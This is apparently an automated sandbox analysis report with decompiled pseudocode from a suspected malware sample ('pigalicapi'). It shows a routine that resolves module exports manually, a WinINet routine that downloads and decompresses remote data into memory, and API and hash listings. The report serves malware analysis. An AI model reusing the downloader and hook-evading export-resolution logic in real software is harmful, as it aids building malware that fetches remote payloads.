                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 02510C71944218AFEB24CF94DC89BEEB7B4EB49700F108598F605B62C0C7B8AE94CF54
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                          			E040035E0(CHAR* _a4, intOrPtr _a8) {
                                                                                                                                                                                                                                                                          				long _v8;
                                                                                                                                                                                                                                                                          				struct HINSTANCE__* _v12;
                                                                                                                                                                                                                                                                          				char _v532;
                                                                                                                                                                                                                                                                          				void* _v536;
                                                                                                                                                                                                                                                                          				long _v540;
                                                                                                                                                                                                                                                                          				void* _v544;
                                                                                                                                                                                                                                                                          				long _v548;
                                                                                                                                                                                                                                                                          				CHAR* _v552;
                                                                                                                                                                                                                                                                          				void* _v556;
                                                                                                                                                                                                                                                                          				int _v560;
                                                                                                                                                                                                                                                                          				char _v820;
                                                                                                                                                                                                                                                                          				CHAR* _v824;
                                                                                                                                                                                                                                                                          				char _v1084;
                                                                                                                                                                                                                                                                          				signed char _v1085;
                                                                                                                                                                                                                                                                          				long _v1092;
                                                                                                                                                                                                                                                                          				intOrPtr _v1096;
                                                                                                                                                                                                                                                                          				long _t124;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                          				_v12 = GetModuleHandleA(_a4);
                                                                                                                                                                                                                                                                          				if(_v12 != 0) {
                                                                                                                                                                                                                                                                          					E04002E50( &_v532,  &_v532, 0, 0x208);
                                                                                                                                                                                                                                                                          					if(GetModuleFileNameA(_v12,  &_v532, 0x207) > 0) {
                                                                                                                                                                                                                                                                          						_v536 = CreateFileA( &_v532, 0x80000000, 7, 0, 3, 0, 0);
                                                                                                                                                                                                                                                                          						if(_v536 != 0xffffffff) {
                                                                                                                                                                                                                                                                          							_v540 = GetFileSize(_v536, 0);
                                                                                                                                                                                                                                                                          							if(_v540 > 0) {
                                                                                                                                                                                                                                                                          								_v544 = VirtualAlloc(0, _v540, 0x3000, 4);
                                                                                                                                                                                                                                                                          								_t155 = _v544;
                                                                                                                                                                                                                                                                          								if(_v544 != 0) {
                                                                                                                                                                                                                                                                          									_v548 = 0;
                                                                                                                                                                                                                                                                          									ReadFile(_v536, _v544, _v540,  &_v548, 0);
                                                                                                                                                                                                                                                                          									_v556 = E04003370(_v536, _t155, _v544, _v540);
                                                                                                                                                                                                                                                                          									_v552 = E04003580(_a8, _v556, _a8);
                                                                                                                                                                                                                                                                          									_v560 = lstrlenA(_v552);
                                                                                                                                                                                                                                                                          									if(_v560 > 2 && _v560 < 0x100) {
                                                                                                                                                                                                                                                                          										_v824 = _v552;
                                                                                                                                                                                                                                                                          										_v1085 = 0;
                                                                                                                                                                                                                                                                          										E04002E50(_v552,  &_v820, 0, 0x100);
                                                                                                                                                                                                                                                                          										E04002E50(_v552,  &_v1084, 0, 0x100);
                                                                                                                                                                                                                                                                          										_v1092 = 0;
                                                                                                                                                                                                                                                                          										while(_v1092 < _v560) {
                                                                                                                                                                                                                                                                          											if(_v824[_v1092] < 0x20 || _v824[_v1092] > 0x7e) {
                                                                                                                                                                                                                                                                          											} else {
                                                                                                                                                                                                                                                                          												if(_v824[_v1092] != 0x2e) {
                                                                                                                                                                                                                                                                          													_t124 = _v1092 + 1;
                                                                                                                                                                                                                                                                          													__eflags = _t124;
                                                                                                                                                                                                                                                                          													_v1092 = _t124;
                                                                                                                                                                                                                                                                          													continue;
                                                                                                                                                                                                                                                                          												} else {
                                                                                                                                                                                                                                                                          													lstrcpynA( &_v820, _v824, _v1092 + 1);
                                                                                                                                                                                                                                                                          													lstrcatA( &_v820, ".dll");
                                                                                                                                                                                                                                                                          													lstrcpyA( &_v1084,  &(_v824[_v1092 + 1]));
                                                                                                                                                                                                                                                                          													_v1085 = 1;
                                                                                                                                                                                                                                                                          												}
                                                                                                                                                                                                                                                                          											}
                                                                                                                                                                                                                                                                          											break;
                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                          										if((_v1085 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                          											_v8 = E040035E0( &_v820,  &_v1084);
                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                          									if(_v8 == 0 && _v552 != 0) {
                                                                                                                                                                                                                                                                          										_v1096 = _v552 - _v556;
                                                                                                                                                                                                                                                                          										_v8 = _v12 + _v1096;
                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                          									VirtualFree(_v556, 0, 0x8000);
                                                                                                                                                                                                                                                                          									VirtualFree(_v544, 0, 0x8000);
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          							CloseHandle(_v536);
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				return _v8;
                                                                                                                                                                                                                                                                          			}




















                                                                                                                                                                                                                                                                          0x040035e9
                                                                                                                                                                                                                                                                          0x040035fa
                                                                                                                                                                                                                                                                          0x04003601
                                                                                                                                                                                                                                                                          0x04003615
                                                                                                                                                                                                                                                                          0x04003635
                                                                                                                                                                                                                                                                          0x04003657
                                                                                                                                                                                                                                                                          0x04003664
                                                                                                                                                                                                                                                                          0x04003679
                                                                                                                                                                                                                                                                          0x04003686
                                                                                                                                                                                                                                                                          0x040036a2
                                                                                                                                                                                                                                                                          0x040036a8
                                                                                                                                                                                                                                                                          0x040036af
                                                                                                                                                                                                                                                                          0x040036b5
                                                                                                                                                                                                                                                                          0x040036dd
                                                                                                                                                                                                                                                                          0x040036f9
                                                                                                                                                                                                                                                                          0x04003712
                                                                                                                                                                                                                                                                          0x04003725
                                                                                                                                                                                                                                                                          0x04003732
                                                                                                                                                                                                                                                                          0x0400374e
                                                                                                                                                                                                                                                                          0x04003754
                                                                                                                                                                                                                                                                          0x04003769
                                                                                                                                                                                                                                                                          0x0400377f
                                                                                                                                                                                                                                                                          0x04003787
                                                                                                                                                                                                                                                                          0x040037a2
                                                                                                                                                                                                                                                                          0x040037c6
                                                                                                                                                                                                                                                                          0x040037e0
                                                                                                                                                                                                                                                                          0x040037f2
                                                                                                                                                                                                                                                                          0x04003799
                                                                                                                                                                                                                                                                          0x04003799
                                                                                                                                                                                                                                                                          0x0400379c
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x040037f4
                                                                                                                                                                                                                                                                          0x0400380c
                                                                                                                                                                                                                                                                          0x0400381e
                                                                                                                                                                                                                                                                          0x0400383c
                                                                                                                                                                                                                                                                          0x04003842
                                                                                                                                                                                                                                                                          0x04003842
                                                                                                                                                                                                                                                                          0x040037f2
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x040037c6
                                                                                                                                                                                                                                                                          0x0400385d
                                                                                                                                                                                                                                                                          0x04003875
                                                                                                                                                                                                                                                                          0x04003875
                                                                                                                                                                                                                                                                          0x0400385d
                                                                                                                                                                                                                                                                          0x0400387c
                                                                                                                                                                                                                                                                          0x04003893
                                                                                                                                                                                                                                                                          0x040038a2
                                                                                                                                                                                                                                                                          0x040038a2
                                                                                                                                                                                                                                                                          0x040038b3
                                                                                                                                                                                                                                                                          0x040038c7
                                                                                                                                                                                                                                                                          0x040038c7
                                                                                                                                                                                                                                                                          0x040036af
                                                                                                                                                                                                                                                                          0x040038d4
                                                                                                                                                                                                                                                                          0x040038d4
                                                                                                                                                                                                                                                                          0x04003664
                                                                                                                                                                                                                                                                          0x04003635
                                                                                                                                                                                                                                                                          0x040038e0

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(?), ref: 040035F4
                                                                                                                                                                                                                                                                          • GetModuleFileNameA.KERNEL32(00000000,?,00000207), ref: 0400362D
                                                                                                                                                                                                                                                                          • CreateFileA.KERNEL32(?,80000000,00000007,00000000,00000003,00000000,00000000), ref: 04003651
                                                                                                                                                                                                                                                                          • GetFileSize.KERNEL32(000000FF,00000000), ref: 04003673
                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 0400369C
                                                                                                                                                                                                                                                                          • ReadFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 040036DD
                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(?), ref: 0400371F
                                                                                                                                                                                                                                                                          • lstrcpynA.KERNEL32(?,?,-00000001), ref: 0400380C
                                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,.dll), ref: 0400381E
                                                                                                                                                                                                                                                                          • lstrcpyA.KERNEL32(?,?), ref: 0400383C
                                                                                                                                                                                                                                                                          • VirtualFree.KERNEL32(?,00000000,00008000), ref: 040038B3
                                                                                                                                                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 040038C7
                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(000000FF), ref: 040038D4
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000006.00000002.599674473.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.599568479.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.600041047.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.600183506.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_4000000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: File$Virtual$FreeHandleModule$AllocCloseCreateNameReadSizelstrcatlstrcpylstrcpynlstrlen
                                                                                                                                                                                                                                                                          • String ID: .dll
                                                                                                                                                                                                                                                                          • API String ID: 4040249471-2738580789
                                                                                                                                                                                                                                                                          • Opcode ID: 200bb4075ff646b41afc5d2470261fe04451761bc05d74db12b83caaac164272
                                                                                                                                                                                                                                                                          • Instruction ID: c2c5132629a25a5507b869beac9dac576087064a04ada7ddd23a517ed68c32e0
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 200bb4075ff646b41afc5d2470261fe04451761bc05d74db12b83caaac164272
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AC814EB5940228ABEB35DF50DC89BDDB7B5AB48304F1081D8EA09B7280D674AFC4CF55
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          C-Code - Quality: 96%
                                                                                                                                                                                                                                                                          			E04002AF0(char* _a4, intOrPtr _a8, long _a12, signed char _a16) {
                                                                                                                                                                                                                                                                          				long _v8;
                                                                                                                                                                                                                                                                          				char _v84;
                                                                                                                                                                                                                                                                          				void* _v88;
                                                                                                                                                                                                                                                                          				signed int _v92;
                                                                                                                                                                                                                                                                          				long _v96;
                                                                                                                                                                                                                                                                          				void _v100;
                                                                                                                                                                                                                                                                          				void _v356;
                                                                                                                                                                                                                                                                          				long _v360;
                                                                                                                                                                                                                                                                          				long _v364;
                                                                                                                                                                                                                                                                          				intOrPtr _v368;
                                                                                                                                                                                                                                                                          				void* _v372;
                                                                                                                                                                                                                                                                          				long _v376;
                                                                                                                                                                                                                                                                          				void* _v380;
                                                                                                                                                                                                                                                                          				signed char _v381;
                                                                                                                                                                                                                                                                          				long _v388;
                                                                                                                                                                                                                                                                          				long _v392;
                                                                                                                                                                                                                                                                          				void* _v396;
                                                                                                                                                                                                                                                                          				char _v652;
                                                                                                                                                                                                                                                                          				long _v656;
                                                                                                                                                                                                                                                                          				long _v660;
                                                                                                                                                                                                                                                                          				void* _t139;
                                                                                                                                                                                                                                                                          				void* _t140;
                                                                                                                                                                                                                                                                          				void* _t142;
                                                                                                                                                                                                                                                                          				long _t149;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                          				if( *0x4013b80 == 0 || _a4 == 0 || _a8 == 0 || _a12 == 0) {
                                                                                                                                                                                                                                                                          					L25:
                                                                                                                                                                                                                                                                          					return _v8;
                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                          					memcpy( &_v84, "Accept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip, deflate\r\n", 0x10 << 2);
                                                                                                                                                                                                                                                                          					asm("movsw");
                                                                                                                                                                                                                                                                          					asm("movsb");
                                                                                                                                                                                                                                                                          					_v92 = 0x80000200;
                                                                                                                                                                                                                                                                          					if((_a16 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                          						_v92 = _v92 | 0x00803000;
                                                                                                                                                                                                                                                                          						_v96 = 4;
                                                                                                                                                                                                                                                                          						_t139 =  *0x4013b80; // 0x0
                                                                                                                                                                                                                                                                          						InternetQueryOptionA(_t139, 0x1f,  &_v100,  &_v96);
                                                                                                                                                                                                                                                                          						_v100 = _v100 | 0x00000100;
                                                                                                                                                                                                                                                                          						_t140 =  *0x4013b80; // 0x0
                                                                                                                                                                                                                                                                          						InternetSetOptionA(_t140, 0x1f,  &_v100, 4);
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					_t142 =  *0x4013b80; // 0x0
                                                                                                                                                                                                                                                                          					_v88 = InternetOpenUrlA(_t142, _a4,  &_v84, 0x42, _v92, 0);
                                                                                                                                                                                                                                                                          					if(_v88 == 0) {
                                                                                                                                                                                                                                                                          						_v660 = GetLastError();
                                                                                                                                                                                                                                                                          						goto L25;
                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                          						_v360 = 0x100;
                                                                                                                                                                                                                                                                          						E04007D20( &_v356,  &_v356, 0, 0x100);
                                                                                                                                                                                                                                                                          						_v364 = 0;
                                                                                                                                                                                                                                                                          						if(HttpQueryInfoA(_v88, 0x13,  &_v356,  &_v360,  &_v364) == 0) {
                                                                                                                                                                                                                                                                          							L23:
                                                                                                                                                                                                                                                                          							InternetCloseHandle(_v88);
                                                                                                                                                                                                                                                                          							goto L25;
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						_v368 = E04007DD0( &_v356);
                                                                                                                                                                                                                                                                          						if(_v368 != 0xc8) {
                                                                                                                                                                                                                                                                          							goto L23;
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						_v372 = VirtualAlloc(0, _a12, 0x3000, 4);
                                                                                                                                                                                                                                                                          						if(_v372 == 0) {
                                                                                                                                                                                                                                                                          							goto L23;
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						_v388 = 0;
                                                                                                                                                                                                                                                                          						_v376 = 0;
                                                                                                                                                                                                                                                                          						_v380 = _v372;
                                                                                                                                                                                                                                                                          						while(1) {
                                                                                                                                                                                                                                                                          							InternetReadFile(_v88, _v380, _a12,  &_v376);
                                                                                                                                                                                                                                                                          							if(_v376 == 0) {
                                                                                                                                                                                                                                                                          								break;
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          							_v388 = _v388 + _v376;
                                                                                                                                                                                                                                                                          							_v380 = _v380 + _v376;
                                                                                                                                                                                                                                                                          							_t149 = _a12 - _v376;
                                                                                                                                                                                                                                                                          							_a12 = _t149;
                                                                                                                                                                                                                                                                          							if(_t149 >= 0) {
                                                                                                                                                                                                                                                                          								continue;
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          							L16:
                                                                                                                                                                                                                                                                          							_v8 = _v388;
                                                                                                                                                                                                                                                                          							_v396 = _v372;
                                                                                                                                                                                                                                                                          							_v392 = 0x100;
                                                                                                                                                                                                                                                                          							E04007D20(_v388,  &_v652, 0, 0x100);
                                                                                                                                                                                                                                                                          							_v381 = 0;
                                                                                                                                                                                                                                                                          							if(HttpQueryInfoA(_v88, 0x1d,  &_v652,  &_v392,  &_v364) != 0 && lstrcmpiA( &_v652, "gzip") == 0) {
                                                                                                                                                                                                                                                                          								_v656 = E04002E00(_v388, _v372, _v388, _a8, _a12);
                                                                                                                                                                                                                                                                          								if(_v656 > 0) {
                                                                                                                                                                                                                                                                          									_v8 = _v656;
                                                                                                                                                                                                                                                                          									_v396 = _a8;
                                                                                                                                                                                                                                                                          									_v381 = 1;
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          							if((_v381 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                          								E04007B70(_a8, _v372, _v8);
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          							VirtualFree(_v372, 0, 0x8000);
                                                                                                                                                                                                                                                                          							goto L23;
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						goto L16;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          			}



























                                                                                                                                                                                                                                                                          0x04002afb
                                                                                                                                                                                                                                                                          0x04002b09
                                                                                                                                                                                                                                                                          0x04002df2
                                                                                                                                                                                                                                                                          0x04002dfa
                                                                                                                                                                                                                                                                          0x04002b2d
                                                                                                                                                                                                                                                                          0x04002b3a
                                                                                                                                                                                                                                                                          0x04002b3c
                                                                                                                                                                                                                                                                          0x04002b3e
                                                                                                                                                                                                                                                                          0x04002b3f
                                                                                                                                                                                                                                                                          0x04002b4c
                                                                                                                                                                                                                                                                          0x04002b57
                                                                                                                                                                                                                                                                          0x04002b5a
                                                                                                                                                                                                                                                                          0x04002b6b
                                                                                                                                                                                                                                                                          0x04002b72
                                                                                                                                                                                                                                                                          0x04002b81
                                                                                                                                                                                                                                                                          0x04002b8c
                                                                                                                                                                                                                                                                          0x04002b93
                                                                                                                                                                                                                                                                          0x04002b93
                                                                                                                                                                                                                                                                          0x04002ba9
                                                                                                                                                                                                                                                                          0x04002bb6
                                                                                                                                                                                                                                                                          0x04002bbd
                                                                                                                                                                                                                                                                          0x04002de0
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04002bc3
                                                                                                                                                                                                                                                                          0x04002bc3
                                                                                                                                                                                                                                                                          0x04002bdb
                                                                                                                                                                                                                                                                          0x04002be3
                                                                                                                                                                                                                                                                          0x04002c10
                                                                                                                                                                                                                                                                          0x04002dce
                                                                                                                                                                                                                                                                          0x04002dd2
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04002dd2
                                                                                                                                                                                                                                                                          0x04002c25
                                                                                                                                                                                                                                                                          0x04002c35
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04002c4e
                                                                                                                                                                                                                                                                          0x04002c5b
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04002c61
                                                                                                                                                                                                                                                                          0x04002c6b
                                                                                                                                                                                                                                                                          0x04002c7b
                                                                                                                                                                                                                                                                          0x04002c81
                                                                                                                                                                                                                                                                          0x04002c97
                                                                                                                                                                                                                                                                          0x04002ca4
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04002cb4
                                                                                                                                                                                                                                                                          0x04002cc6
                                                                                                                                                                                                                                                                          0x04002ccf
                                                                                                                                                                                                                                                                          0x04002cd5
                                                                                                                                                                                                                                                                          0x04002cd8
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04002cdc
                                                                                                                                                                                                                                                                          0x04002cde
                                                                                                                                                                                                                                                                          0x04002ce4
                                                                                                                                                                                                                                                                          0x04002ced
                                                                                                                                                                                                                                                                          0x04002cf3
                                                                                                                                                                                                                                                                          0x04002d0b
                                                                                                                                                                                                                                                                          0x04002d13
                                                                                                                                                                                                                                                                          0x04002d3d
                                                                                                                                                                                                                                                                          0x04002d70
                                                                                                                                                                                                                                                                          0x04002d7d
                                                                                                                                                                                                                                                                          0x04002d85
                                                                                                                                                                                                                                                                          0x04002d8b
                                                                                                                                                                                                                                                                          0x04002d91
                                                                                                                                                                                                                                                                          0x04002d91
                                                                                                                                                                                                                                                                          0x04002d7d
                                                                                                                                                                                                                                                                          0x04002da1
                                                                                                                                                                                                                                                                          0x04002db2
                                                                                                                                                                                                                                                                          0x04002db7
                                                                                                                                                                                                                                                                          0x04002dc8
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04002dc8
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04002ca6
                                                                                                                                                                                                                                                                          0x04002bbd

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • InternetQueryOptionA.WININET(00000000,0000001F,?,00000004), ref: 04002B72
                                                                                                                                                                                                                                                                          • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 04002B93
                                                                                                                                                                                                                                                                          • InternetOpenUrlA.WININET(00000000,00000000,?,00000042,80000200,00000000), ref: 04002BB0
                                                                                                                                                                                                                                                                          • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 04002C08
                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 04002C48
                                                                                                                                                                                                                                                                          • InternetReadFile.WININET(00000000,?,00000000,00000000), ref: 04002C97
                                                                                                                                                                                                                                                                          • HttpQueryInfoA.WININET(00000000,0000001D,?,00000100,00000000), ref: 04002D35
                                                                                                                                                                                                                                                                          • lstrcmpiA.KERNEL32(?,gzip), ref: 04002D4B
                                                                                                                                                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 04002DC8
                                                                                                                                                                                                                                                                          • InternetCloseHandle.WININET(00000000), ref: 04002DD2
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 04002DDA
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          • gzip, xrefs: 04002D3F
                                                                                                                                                                                                                                                                          • Accept: */*Accept-Language: enAccept-Encoding: gzip, deflate, xrefs: 04002B32
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000006.00000002.599674473.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.599568479.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.600041047.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.600183506.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_4000000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Internet$Query$HttpInfoOptionVirtual$AllocCloseErrorFileFreeHandleLastOpenReadlstrcmpi
                                                                                                                                                                                                                                                                          • String ID: Accept: */*Accept-Language: enAccept-Encoding: gzip, deflate$gzip
                                                                                                                                                                                                                                                                          • API String ID: 2564233093-2863726208
                                                                                                                                                                                                                                                                          • Opcode ID: 726b61e79d92e4b1ea791cc461ac74fab5e679057ddcff3c63822b6443729a61
                                                                                                                                                                                                                                                                          • Instruction ID: 59e70dbda308a2a2546c0d296605ce979221f8659c43edef85f985c08622dbb4
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 726b61e79d92e4b1ea791cc461ac74fab5e679057ddcff3c63822b6443729a61
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6B91FC75904218ABEB65CF94CC48BEAB7B5BB48304F50819DE609BB280DB796E84CF50
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          C-Code - Quality: 47%
                                                                                                                                                                                                                                                                          			E00401A87(struct HWND__* _a4, struct HDC__** _a8, intOrPtr* _a12) {
                                                                                                                                                                                                                                                                          				void* _v12;
                                                                                                                                                                                                                                                                          				int _v16;
                                                                                                                                                                                                                                                                          				struct tagPIXELFORMATDESCRIPTOR _v56;
                                                                                                                                                                                                                                                                          				void* _v72;
                                                                                                                                                                                                                                                                          				PIXELFORMATDESCRIPTOR* _v76;
                                                                                                                                                                                                                                                                          				int _v80;
                                                                                                                                                                                                                                                                          				intOrPtr _v96;
                                                                                                                                                                                                                                                                          				int _t35;
                                                                                                                                                                                                                                                                          				void* _t59;
                                                                                                                                                                                                                                                                          				struct HDC__** _t63;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				 *_a8 = GetDC(_a4);
                                                                                                                                                                                                                                                                          				memset( &_v56, 0, 0x28 << 0);
                                                                                                                                                                                                                                                                          				_v56.nSize = 0x28;
                                                                                                                                                                                                                                                                          				_v56.nVersion = 1;
                                                                                                                                                                                                                                                                          				_v56.dwFlags = 0x25;
                                                                                                                                                                                                                                                                          				_v56.iPixelType = 0;
                                                                                                                                                                                                                                                                          				_v56.cColorBits = 0x18;
                                                                                                                                                                                                                                                                          				_v56.cDepthBits = 0x10;
                                                                                                                                                                                                                                                                          				_v56.iLayerType = 0;
                                                                                                                                                                                                                                                                          				_t35 = ChoosePixelFormat( *_a8,  &_v56);
                                                                                                                                                                                                                                                                          				_t63 = _t59 - 0x3c + 0xc - 8;
                                                                                                                                                                                                                                                                          				_v16 = _t35;
                                                                                                                                                                                                                                                                          				_v76 =  &_v56;
                                                                                                                                                                                                                                                                          				_v80 = _v16;
                                                                                                                                                                                                                                                                          				 *_t63 =  *_a8;
                                                                                                                                                                                                                                                                          				SetPixelFormat(??, ??, ??);
                                                                                                                                                                                                                                                                          				 *_a12 = wglCreateContext( *_a8);
                                                                                                                                                                                                                                                                          				_v96 =  *_a12;
                                                                                                                                                                                                                                                                          				 *(_t63 - 8) =  *_a8;
                                                                                                                                                                                                                                                                          				return wglMakeCurrent(??, ??);
                                                                                                                                                                                                                                                                          			}













                                                                                                                                                                                                                                                                          0x00401aa2
                                                                                                                                                                                                                                                                          0x00401ab4
                                                                                                                                                                                                                                                                          0x00401ab6
                                                                                                                                                                                                                                                                          0x00401abc
                                                                                                                                                                                                                                                                          0x00401ac2
                                                                                                                                                                                                                                                                          0x00401ac9
                                                                                                                                                                                                                                                                          0x00401acd
                                                                                                                                                                                                                                                                          0x00401ad1
                                                                                                                                                                                                                                                                          0x00401ad5
                                                                                                                                                                                                                                                                          0x00401ae8
                                                                                                                                                                                                                                                                          0x00401aed
                                                                                                                                                                                                                                                                          0x00401af0
                                                                                                                                                                                                                                                                          0x00401afb
                                                                                                                                                                                                                                                                          0x00401b02
                                                                                                                                                                                                                                                                          0x00401b06
                                                                                                                                                                                                                                                                          0x00401b09
                                                                                                                                                                                                                                                                          0x00401b26
                                                                                                                                                                                                                                                                          0x00401b32
                                                                                                                                                                                                                                                                          0x00401b36
                                                                                                                                                                                                                                                                          0x00401b47

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000006.00000002.558505777.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.558382730.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.558681103.0000000000404000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.558864837.0000000000406000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.559037175.0000000000409000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.559758809.0000000000420000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_400000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: FormatPixel$ChooseContextCreateCurrentMake
                                                                                                                                                                                                                                                                          • String ID: %$(
                                                                                                                                                                                                                                                                          • API String ID: 2475745930-93983813
                                                                                                                                                                                                                                                                          • Opcode ID: bd8fdc46a3119f9d830930fbf617ed2ae314094ba22175109ede142dcb2d6e48
                                                                                                                                                                                                                                                                          • Instruction ID: 29c35ce5724b02326a6e865684fa907032f963153ea5e9f52b2dfbce4176bea2
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bd8fdc46a3119f9d830930fbf617ed2ae314094ba22175109ede142dcb2d6e48
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 44210C74A057489FCB00EF69D18558EBBF1EF89314F00C469E848AB354E775EA18CB56
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • SetLastError.KERNEL32(0000007F), ref: 100014DB
